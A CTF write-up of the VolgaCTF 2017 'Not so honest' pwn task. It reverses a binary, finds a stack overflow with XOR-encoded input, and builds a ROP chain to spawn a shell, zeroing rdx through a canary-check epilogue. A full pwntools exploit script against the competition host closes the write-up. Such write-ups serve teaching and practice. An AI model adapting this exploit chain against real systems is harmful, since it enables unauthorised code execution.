Rating:
[writeup by @abiondo]
**CTF:** VolgaCTF 2017 Quals
**Team:** spritzers (from [SPRITZ Research Group](http://spritz.math.unipd.it/))
**Task:** exploits / Not so honest
**Points:** 350
```
This server application claims to give you the flag provided you give it your encryption key. Honestly. But where's the catch?
```
We have an ELF 64-bit Linux binary. `checksec.sh` shows partial RELRO, stack canary, NX and no PIE.
If we run the binary without arguments, it shows the usage:
```
usage:
not_so_honest <flag_file> <key_file>
<flag_file> flag to give away
<key_file> key file
```
If we give it two files, it asks for a key to give us the flag. I started reversing the binary and noticed a stack overflow right away in `main`:
```
char input_key_hex[4096];
...
scanf("%s", input_key_hex);
```
The input key is then hexdecoded and processed. Since there's a stack canary we'd need a leak, but I tried feeding it an input of something like 4500 `A`s anyway. Let's look at the crash:
```
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401401 in ?? ()
(gdb) x/i $rip
=> 0x401401: retq
(gdb) x/xg $rsp
0x7fffffffc3b8: 0x04bfef148209ddea
```
Something funky is going on here. I expected an abort due to canary corruption, instead it's trying to jump to a corrupted return address, which should be prevented by the canary. In fact, `0x401401` is not in `main`! So there's another function vulnerable to stack overflows that isn't protected by the canary. Another thing I notice is that the return address `0x04bfef148209ddea`, while it doesn't look anything like a valid address, also doesn't look anything like our input.
I start looking at the code around `0x401401`, which is poorly handled by IDA as it has some random bytes in between instructions that I have to manually fix. To make things quicker, I fire up `qira` and trace the last write to the return address, which gets me to this loop:
```
.text:401383 loc_401383:
.text:401383 mov r14, [r9+r11] ; r14 = *((uint64_t *) (r9 + r11))
.text:401387 xor r14, [r10+r11] ; r14 ^= *((uint64_t *) (r10 + r11))
.text:40138B xor r14, [rdx+r11] ; r14 ^= *((uint64_t *) (rdx + r11))
.text:40138F mov [rsp+r11], r14 ; *((uint64_t *) (rsp + r11)) = r14
.text:401393 add r11, 8 ; r11 += 8
.text:401397 cmp r11, rcx
.text:40139A jl short loc_401383 ; while (r11 < rcx) repeat
```
It's encoding and copying input data to the stack. `r11` is the offset, which starts at zero and is incremented by 8 every iteration (because it's writing 8 bytes at a time). `rdx` points to the hexdecoded input buffer (in our case, `{0xaa, 0xaa, ...}`). `r9` points to some magic buffer at `0x602088` (in `.data`). `rdx` points to code at `0x401313`. `rcx` is the size of the hexdecoded input buffer (half the input size), but it's capped at `2047`. This means it can write up to 2kB of data. The return address is overwritten at the iteration with `r11` = 104, so we have ample space for our ROP chain.
The code at `0x401313` is obviously not going to change. The buffer at `0x602088` is pre-initialized in the binary and has some modifications done at runtime. The first 104 (!) bytes are zero and are not changed. Then it has:
- 256 bytes XORed, QWORD-wise, with `0x2a8429e525bc3757`
- 256 bytes XORed, QWORD-wise, with `0x241b0b5573dca89a`
- 104 bytes XORed, QWORD-wise, with `0x9ae43ac798b2df95`
I only cared about the first 256 bytes block, since it's more than enough for my ROP chain. With this knowledge we can generate an input that decodes exactly to what we want: we just need to XOR our desired result with the two QWORDs for the offset it's located at. To get to the return address we need an input with `104 * 2 = 208` hex digits before our XOR-encoded and then hexencoded address. Indeed it works, RIP control achieved!
The binary has NX enabled, so we need to build a ROP chain. There's a nice `syscall` gadget, so we're going to call `execve("/bin/sh", {NULL}, NULL)`. We need gadgets to set the syscall number (`rax`) and the first three arguments (`rdi`, `rsi`, `rdx`). We also need a write-what-where gadget for `filename` and `argv`. All but `rdx` are easy:
```
POP_RAX = 0x401315 # pop rax; ret;
POP_RDI = 0x4014a3 # pop rdi; ret;
POP_RSI = 0x400816 # pop rsi; ret;
SYSCALL = 0x40135b # syscall; ret;
WWW_RDI_RAX = 0x40136a # mov qword ptr [rdi], rax; ret;
```
I couldn't find a gadget to set `rdx`. We actually only need to zero it out. I tried division and multiplication instructions (which have side-effects on `rdx`) without luck. Ironically, I found a way out by abusing the stack canary mitigation. Functions with this mitigation store the canary from `fs:28h` in the stack between locals and the return address in their prologue. In the epilogue they compare the stack canary against the real canary from `fs:28h` and, if they are not equal, abort execution without returning. The catch is how this check is done: the stack canary is loaded into a register, then the register is XORed with the canary from `fs:28h` and the check fails if the register is not zero. This means that, after executing the function, that register will be zeroed. You can probably guess I found a function that used `rdx` for the check and was very easy to call without significant side effects:
```
.text:400BE0 sub rsp, 18h
.text:400BE4 mov byte ptr [rdi+rsi], 80h
.text:400BE8 shr rsi, 3
.text:400BEC mov rax, fs:28h ; load real canary
.text:400BF5 mov [rsp+8], rax ; store canary on stack
.text:400BFA xor eax, eax
.text:400BFC mov rdx, [rsp+8] ; rdx = stack canary
.text:400C01 xor rdx, fs:28h ; rdx ^= real canary
.text:400C0A jnz short loc_400C15 ; != 0 -> check failed
.text:400C0C lea rax, [rsi+1]
.text:400C10 add rsp, 18h
.text:400C14 retn
.text:400C15 loc_400C15:
.text:400C15 call ___stack_chk_fail
```
All this function does is storing the byte `0x80` at the address `rdi + rsi`, so we just need to make this point to some writable address. We have gadgets to set `rdi` and `rsi`, so it's not a problem. But we could also jump straight to `0x400bec` and avoid that. The stack pointer will be advanced by 24 bytes, which means we need as many bytes of junk in the chain. Setting `rdi` and `rsi` is 32 bytes, so let's go with `0x400bec`. The code will also corrupt `rax`, but that's not a significant issue.
I built a straightforward chain (see exploit code for details) and got a shell on my machine. When connecting to the remote service, I was presented with a puzzle such as:
```
Solve a puzzle: find an x such that 26 last bits of SHA1(x) are set, len(x)==29 and x[:24]=='41c171a223545b5bc9e7b2a2'
```
I just bruteforced it with printable characters. At last, we have a shell:
```
$ cat flag.txt
VolgaCTF{ASLR_is_Usele$s_when_syscall_ret_is_in_B1n@ry}
```
Full exploit code (the encoding is based off the +104 offset, 256 bytes were more than enough):
```python
#!/usr/bin/python2
from pwn import *
import hashlib
import itertools
import sys
DATA_STUFF = '561A5EB65B6C91842F343B815D114B155F50B5B10E0F2C41EA2F883E5E96F6DD1702F4B9B406BF7FB4F723FD36DA099BA89082F9635E538C46CC489F77B8E0A9A60453FFC99C3601DFE625EE69AD993ED6A0CDEFBA8A0F7D6BB57877B9356C8A5383396F133AD09C883BA6AB3BC9BDD677AC986B4CB11A81A5576C490FD343F357E3A34BA6956879DEC9C678ACE0B6E8AEAD4448F3F2DDBC13DE71C3A36B0B2096FB054055FB42864976DE0CCB27F07A556D7F009EA3AE71A731B1628A59195447F9AE023065CBFC2E07D413905460C7D75D2C124777F2809248818A40CC9D4BAA7AC092EEC7296175C25B56C6084C2FB6516196BD40E77C58968DB0F22EBE02'.decode('hex')
TEXT_STUFF = '415A41BB000000004F8B34194F33341A4E33341A4E89341C4983C3084939CB7CE778037901E9478A34194732341A4632341A4688341C49FFC34939CB7CE84989E24989FC4C8D2CF500000000E806000000E8A601400000488B04244883C01348890424C34831DB498B141CE8A3FDFFFF4989141C4883C3084C39EB7CEA78037901E94883C468C34989F44C8B0249B9882060000000000078037901E8E8F0FDFFFF78037901E8488B174D89CAE862FDFFFF49891424C3662E0F1F8400000000000F1F440000415741564189FF415541544C8D25BE09200055488D2DBE092000534989F64989D54C29E54883EC0848C1FD03E847F2FFFF4885ED742031DB0F1F84'.decode('hex')
context(arch='amd64', os='linux')
p = remote('not-so-honest.quals.2017.volgactf.ru', 45678)
p.recvuntil("x[:24]=='")
key_start = p.read(24)
print('[+] Bruteforcing key...')
alpha = [chr(i) for i in range(0x20, 0x7F + 1)]
key = None
for cand in itertools.product(alpha, repeat=5):
cand_key = key_start + ''.join(cand)
digest = hashlib.sha1(cand_key).digest()
if digest[-3:] == '\xff\xff\xff' and ord(digest[-4]) & 3 == 3:
key = cand_key
break
if key is None:
print('ERROR: no key')
sys.exit(1)
print('[+] Found key: ' + key)
p.sendline(key)
POP_RAX = p64(0x401315) # pop rax; ret;
POP_RDI = p64(0x4014a3) # pop rdi; ret;
POP_RSI = p64(0x400816) # pop rsi; ret;
SYSCALL = p64(0x40135b) # syscall; ret;
WWW_RDI_RAX = p64(0x40136a) # mov qword ptr [rdi], rax; ret;
ZERO_RDX = p64(0x400bec) # zero rdx; corrupt rax; add rsp, 24; ret;
W_ADDR = 0x602100 # @ .data
rop_www = lambda addr, val : POP_RDI + p64(addr) + POP_RAX + val + WWW_RDI_RAX
# write '/bin/sh\x00' to W_ADDR (filename)
rop = rop_www(W_ADDR, '/bin/sh\x00')
# write NULL to W_ADDR + 8 (argv[0])
rop += rop_www(W_ADDR + 8, p64(0))
# 1st arg (filename) = W_ADDR
rop += POP_RDI + p64(W_ADDR)
# 2nd arg (argv) = W_ADDR + 8
rop += POP_RSI + p64(W_ADDR + 8)
# 3rd arg (envp) = NULL
rop += ZERO_RDX + 'A'*24 # 24 bytes junk
# syscall number = 0x3b (execve)
rop += POP_RAX + p64(0x3b)
# execve("/bin/sh", {NULL}, NULL)
rop += SYSCALL
# junk to get to return address
buf = 'A' * 208
# encode chain
for i in range(0, len(rop), 8):
enc = u64(DATA_STUFF[i:i+8])
enc ^= 0x2a8429e525bc3757
enc ^= u64(TEXT_STUFF[i:i+8])
enc ^= u64(rop[i:i+8])
buf += p64(enc).encode('hex')
p.sendline(buf)
p.interactive()
```